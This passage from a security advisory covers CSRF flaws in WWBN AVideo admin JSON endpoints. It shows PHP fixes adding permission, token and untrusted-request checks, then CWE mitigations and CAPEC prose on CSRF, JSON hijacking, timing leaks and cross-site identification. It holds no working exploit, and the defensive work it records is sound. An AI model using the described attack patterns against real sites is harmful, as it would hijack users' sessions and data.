18)\nif (!Category::canCreateCategory()) {\n $obj-\u003emsg = __(\"Permission denied\");\n die(json_encode($obj));\n}\nif (!isGlobalTokenValid()) {\n http_response_code(403);\n die(\u0027{\"error\":\"\u0027 . __(\u0027Invalid token\u0027) . \u0027\"}\u0027);\n}\nforbidIfIsUntrustedRequest();\n```\n\n```php\n// objects/categoryDelete.json.php (after line 12)\nif (!Category::canCreateCategory()) {\n die(\u0027{\"error\":\"\u0027 . __(\"Permission denied\") . \u0027\"}\u0027);\n}\nif (!isGlobalTokenValid()) {\n http_response_code(403);\n die(\u0027{\"error\":\"\u0027 . __(\u0027Invalid token\u0027) . \u0027\"}\u0027);\n}\nforbidIfIsUntrustedRequest();\n```\n\n```php\n// objects/pluginRunUpdateScript.json.php (after line 11)\nif (!User::isAdmin()) {\n forbiddenPage(\u0027Permission denied\u0027);\n}\nif (!isGlobalTokenValid()) {\n http_response_code(403);\n die(\u0027{\"error\":\"\u0027 . __(\u0027Invalid token\u0027) . \u0027\"}\u0027);\n}\nforbidIfIsUntrustedRequest();\n```\n\nThe long-term fix is to apply `forbidIfIsUntrustedRequest()` to every state-changing JSON endpoint via a shared include (e.g., a mandatory bootstrap file loaded by all `*.json.php` endpoints), so that future handlers cannot forget the check.",
"id": "GHSA-ffw8-fwxp-h64w",
"modified": "2026-04-24T20:31:24Z",
"published": "2026-04-14T23:12:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffw8-fwxp-h64w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40926"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/ee5615153c40628ab3ec6fe04962d1f92e67d3e2"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "WWBN AVideo has Multiple CSRF Vulnerabilities in Admin JSON Endpoints (Category CRUD, Plugin Update Script)"
}
Mitigation MIT-4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330]
- Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45]
Mitigation
Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script.
Mitigation
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332]
Mitigation
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Mitigation
- Use the "double-submitted cookie" method as described by Felten and Zeller:
- When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user's machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same.
- Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult.
- This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331]
Mitigation
Do not use the GET method for any request that triggers a state change.
Mitigation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
CAPEC-111: JSON Hijacking (aka JavaScript Hijacking)
An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.
CAPEC-462: Cross-Domain Search Timing
An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.
CAPEC-467: Cross Site Identification
An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the "remember me" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).
CAPEC-62: Cross Site Request Forgery
An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.